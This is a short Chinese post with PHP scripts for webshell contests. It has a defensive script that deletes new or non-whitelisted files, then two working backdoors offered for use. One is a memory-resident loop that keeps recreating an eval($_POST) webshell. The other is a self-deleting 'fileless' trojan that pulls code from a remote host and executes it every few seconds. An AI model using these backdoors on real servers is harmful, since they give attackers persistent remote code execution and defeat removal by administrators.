php webshell删与防脚本

php删除webshell脚本，根据文件名，文件内容，文件的修改时间删除，可以暴力点，只要是新上传，新修改的文件，一律删除，代码自己修改

<?php
function filter($file) {
// 网页白名单
$whiteList = array('rois.php','hello.php');

//获取当前相对路径
$url = $_SERVER['PHP_SELF'];

//获取文件名
$filename= substr($url , strrpos($url , '/')+1 );

//不删除本文件
if ($file == $filename){
return false;
}

//在白名单中则不过滤
if (in_array($file, $whiteList)){
return false;
}

//读取文件内容
@$fp = fopen($file,'r');
@$buf = fread($fp, 512);
@fclose($fp);

//包含关键字不过滤
if (stristr($buf , 'hehehe')){
return false;
}

return true;
}

function delNewInput($old, $new) {
if (filemtime($new) > filemtime($old)) {
return true;
}
return false;
}

function delFileFromDir($dir) {
//判断是否是目录
if (!is_dir($dir)) {
return false;
}

//获取当前相对路径
$url = $_SERVER['PHP_SELF'];

//获取文件名
$filename = substr($url , strrpos($url , '/')+1);

//打开目录
$handle = opendir($dir);
while (($file = readdir($handle)) !== false) {
//排除掉当前目录和上一个目录
if ($file == "." || $file == "..") {
continue;
}

$fullPath = $dir . "/". $file;

//如果是文件且不符合过滤规则或者是新上传就删除，否则递归调用
if ((is_file($fullPath) && filter($file)) || (is_file($fullPath) && delNewInput($filename, $fullPath))) {
print "Have deled ".$file . '<br />';
unlink($fullPath);
}
elseif (is_dir($fullPath)) {
delFileFromDir($fullPath);
}
}
}

$dir = '.';
delFileFromDir($dir);
?>

如果想循环删除，可以写个sh脚本

#!/bin/sh

while :
do
curl http://test.com/defFile.php done

 

php防删木马，驻留在内存中，当文件不存在，就自动生成，只有服务器重启，脚本才停止运行

<?php
ignore_user_abort(true);
set_time_limit(0);
$file = './hehehe.php';
$code = '<?php @eval($_POST[test321]); ?>';

while (1){
if(!file_exists($file)){
file_put_contents($file,$code);
}
usleep(50);
}
?>

 

php无文件木马，在一开始便把自身删除，主流在内存里，优点是无法查看到木马，缺点是重启以后木马就不在了

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};

?>